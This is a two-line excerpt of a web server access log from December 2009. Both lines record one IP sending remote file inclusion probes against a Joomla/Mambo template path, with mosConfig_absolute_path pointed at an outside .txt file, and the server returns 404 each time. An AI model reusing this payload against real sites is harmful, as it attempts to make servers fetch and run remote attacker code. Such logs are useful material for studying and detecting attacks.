85.236.38.227 - - [14/Dec/2009:09:51:22 -0800] "GET /templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
85.236.38.227 - - [14/Dec/2009:09:51:22 -0800] "GET /logs//templates/be2004-2/index.php?mosConfig_absolute_path=http://gimpindustries.net/phplive/setup/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
